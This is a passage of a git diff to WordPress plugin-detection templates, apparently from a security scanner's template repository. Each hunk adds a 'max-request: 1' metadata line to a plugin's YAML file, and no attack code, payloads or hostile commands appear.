+7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- 